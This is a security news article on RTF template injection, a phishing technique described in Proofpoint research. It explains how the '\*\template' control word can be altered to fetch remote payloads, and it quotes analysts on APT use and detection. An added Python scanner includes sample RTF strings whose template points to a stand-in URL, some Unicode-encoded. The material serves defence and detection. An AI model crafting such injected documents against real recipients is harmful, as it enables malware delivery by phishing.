The Toronto Proofpoint office. (Raysonho @ Open Grid Scheduler / Scalable Grid Engine, CC0, via Wikimedia Commons)

Researchers expressed concern that cybercriminal actors will increasingly adopt RTF injection as a way to weaponize emailed documents, due to the technique’s accessibility and triviality compared to similar techniques.

Via RTF injection, attackers can manipulate Rich Text Format files so that they retrieve malicious content from an external URL instead of from a legitimate file resource destination. This is possible because the RTF file code contains document formatting properties that can be easily changed with a hex editor, without the need for a word processor application, according to a recently published blog post from Proofpoint.

Moreover, Proofpoint found that the sample RTF template injection files it analyzed had a lower antivirus engine detection rate compared to a previously established Microsoft Office-based template injection technique.

“Previous techniques largely relied on the use of embedded objects within the RTF file structure to deliver malicious payloads. That requires the compilation of a payload (or multiple stages of payloads and installers) which are then encoded and embedded within an RTF file… so the payload can be installed upon opening,” explained Sherrod DeGrippo, Proofpoint’s vice president of threat research and detection, in an interview with SC Media. But this new method “potentially removes the need for developer derived tools and places the power in the hands of operational phishing teams delivering malicious email campaigns.”

There’s a big upside for attackers executing this tactic because “many organizations do not block RTF files by default,” she added. “They are part of the ordinary fabric of a business operations environment.”

Proofpoint has identified three APT groups that leveraged RTF injection for phishing campaigns in Q2 and Q3 of 2021, and the company’s researchers said they are “moderately confident” that we could soon see a significant uptick in activity featuring the same tactic, this time perpetrated by less sophisticated, financially motivated actors.

“RTF template injection is poised for wider adoption in the threat landscape including among cybercriminals based on its ease of use and relative effectiveness when compared with other phishing attachment template injection-based techniques,” wrote blog author Michael Raggi, senior threat researcher engineer.

In fact, DeGrippo told SC Media that RTF template injection has already “been used before in a limited capacity by crimeware actors,” citing research from analyst Fareed Fauzi in January 2021 and an additional blog post from July 2021.

“We often see new or updated techniques that are discovered by groups with more resources, [get] adopted by smaller groups or individuals once it’s known how to execute the particular attack type,” said Hank Schless, senior manager, security solutions at Lookout. “With the number of documents we receive on a daily basis across email, collaboration platforms, networking apps and more, this tactic is also prime for social engineering.”

Raggi’s report described the technique as follows: “RTF files include a ‘\*\template’ control word, where the value ‘*\’ designates that the following value is a destination, and ‘template’ designates the specific control word function. This control word value is intended to be the destination of a legitimate template file which is retrieved and loaded upon the opening of the initial RTF, changing the visual appearance of the file. However, it is trivial to alter the bytes of an existing RTF file to insert a template control word destination including a URL resource. This allows the RTF file to retrieve a URL resource as a destination rather than a file like the RTF structure intends. This method is viable in both .rtf and .doc.rtf files, allowing for the successful retrieval of remote payloads hosted at an external URL.”

Depending on the format of the weaponized file, victims at certain points see some combination of a decoy document, a “contacting the server” message and/or an error message.

“Successfully executing this attack could deliver malware into the organization's infrastructure,” said Schless. “Aside from infecting the infrastructure, this could also lead to creation of a backdoor into the organization. This would enable the attacker to enter the infrastructure undetected and move laterally in search of valuable data or observe the organization’s behaviors and security protections to eventually carry out an advanced cyberattack.”

According to Proofpoint, the technique has already been used by the reputed Indian APT group DoNot Team, a Chinese-related APT actor and suspected Russian APT actor Gamaredon.

“The viability of XML Office based remote template documents has proven that this type of delivery mechanism is a durable and effective method when paired with phishing as an initial delivery vector,” Raggi wrote. “The innovation by threat actors to bring this method to a new file type in RTFs represents an expanding surface area of threat for organizations worldwide.”

As for how organizations can best protect themselves and their employees against this particular phishing threat, detection will be key. For that, DeGrippo recommended “to scan incoming RTF files with some sort of signature type like Yara or Clam AV for the RTF template control group including a URL or Unicode bytes comprising an encoded URL.” (Proofpoint lists some signatures in its blog post.)

“RTFs like mentioned in the blog have their file properties in plaintext so detecting this type of technique in an organization’s traffic should be relatively easy if conducting file scanning at the email gateway or on the host,” DeGrippo continued. “However, it's important to keep in mind that legitimate RTF files may use the RTF template control word to redirect to legitimate template files, not URLs.”
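As an added illustration (not one of Proofpoint's signatures, and not code from the report), the Python sketch below applies that advice at a gateway or on a host: it locates each template destination, resolves `\uN` Unicode escapes, and flags the file only when the destination is a URL rather than a file path. The function name `scan_rtf`, the sample documents and the `example.invalid` URL are constructed assumptions.

```python
import re

# {\*\template <destination>}: "\*" marks a destination group, "template" is
# the control word. Nested groups inside the destination are not handled.
TEMPLATE_RE = re.compile(r"\{\s*\\\*\s*\\template(?![a-z])\s*([^{}]*)\}")
# A \uN escape (decimal N, optional space, one fallback character, assuming
# the default \uc1) or an escaped backslash/brace.
TOKEN_RE = re.compile(r"\\u(-?\d+) ?(?:\\'[0-9a-fA-F]{2}|[^\\{}])?|\\([\\{}])")
URL_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)


def _resolve(m: re.Match) -> str:
    if m.group(1) is not None:
        return chr(int(m.group(1)) & 0xFFFF)  # negative N wraps to 16 bits
    return m.group(2)


def scan_rtf(data: bytes) -> list[dict]:
    """Return one finding per template destination; URL targets are flagged."""
    if not data.lstrip().startswith(b"{\\rt"):
        return []  # not an RTF document
    findings = []
    for m in TEMPLATE_RE.finditer(data.decode("latin-1")):
        raw = m.group(1)
        dest = TOKEN_RE.sub(_resolve, raw).strip()
        findings.append({
            "offset": m.start(),
            "destination": dest,
            "encoded": any(t.group(1) is not None for t in TOKEN_RE.finditer(raw)),
            "suspicious": bool(URL_RE.match(dest)),
        })
    return findings


# Constructed samples (not taken from any real campaign).
URL = "http://example.invalid/t.dotx"
LOCAL_FILE = rb"{\rtf1\ansi{\*\template C:\\Templates\\Report.dotx}Report}"
PLAIN_URL = b"{\\rtf1\\ansi{\\*\\template " + URL.encode() + b"}Decoy}"
ENCODED_URL = (b"{\\rtf1\\ansi{\\*\\template "
               + "".join(f"\\u{ord(c) - 65536}?" for c in URL).encode()
               + b"}Decoy}")

if __name__ == "__main__":
    for name in ("LOCAL_FILE", "PLAIN_URL", "ENCODED_URL"):
        print(name, scan_rtf(globals()[name]))
```

The local-path sample is reported but not flagged, which reflects the caveat about legitimate template destinations; only the plain and Unicode-encoded URL samples are marked suspicious.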

Sean Nikkel, senior cyber threat intel analyst at Digital Shadows, added that users “should become aware of the risks of opening documents that require downloads of templates or other data from the internet, especially from unknown users. Organizations may want to consider restricting the use of certain file types, such as RTF, in case security tools don't catch suspicious signatures or behaviors that would be a giveaway for attacks like these. An even more restrictive security stance might involve stripping inbound emails of attachments or using a sandbox to test them for malicious activity.”

The onus falls largely on email recipients and their organizations because, unfortunately, there’s not much chance that the RTF format will be revised and better secured against manipulation.

“The fundamentals of the RTF file type, including destination control words and the 16-bit Unicode characters used by actors have been ‘baked in’ so to speak since RTF v 1.5 in April of 1997,” explained DeGrippo. “Microsoft discontinued development on RTF in 2008; however, it continues to be supported by applications in almost every operating system. So while the RTF file format could possibly be fundamentally reimagined, the likelihood of a file type not under active development being updated for security reasons is unlikely.”